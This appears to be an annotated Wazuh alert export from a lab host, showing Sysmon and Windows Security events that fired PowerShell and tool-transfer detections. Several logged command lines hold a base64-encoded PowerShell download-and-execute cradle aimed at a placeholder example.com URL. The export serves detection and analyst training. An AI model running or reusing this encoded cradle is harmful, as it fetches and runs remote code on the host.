data.win.eventdata.processGuid: {94294ddc-bd51-680a-690b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fabyeuej.msp.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:10.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534293.1567082 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:10.4754770Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43855 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 66 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534295.1574417 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:13.3701266Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284355 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:12.078
ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00}
ProcessId: 15472
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd51-680a-690b-000000000e00}
ParentProcessId: 10148
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:12.078 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd54-680a-6c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15472 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 70 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534296.1582488 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:13.6116365Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284380 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:38:13.586
ProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00}
ProcessId: 15472
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pfax4tpn.eqc.ps1
CreationUtcTime: 2025-04-24 22:38:13.586
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:13.586 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd54-680a-6c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15472 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pfax4tpn.eqc.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:38:13.586 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 67 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534299.1585257 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:38:16.7381749Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 284469 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:38:15.366
ProcessGuid: {94294ddc-bd57-680a-6e0b-000000000e00}
ProcessId: 15624
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00}
ParentProcessId: 15472
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:38:15.366 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd57-680a-6e0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd54-680a-6c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15472 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 71 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534299.1593328 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
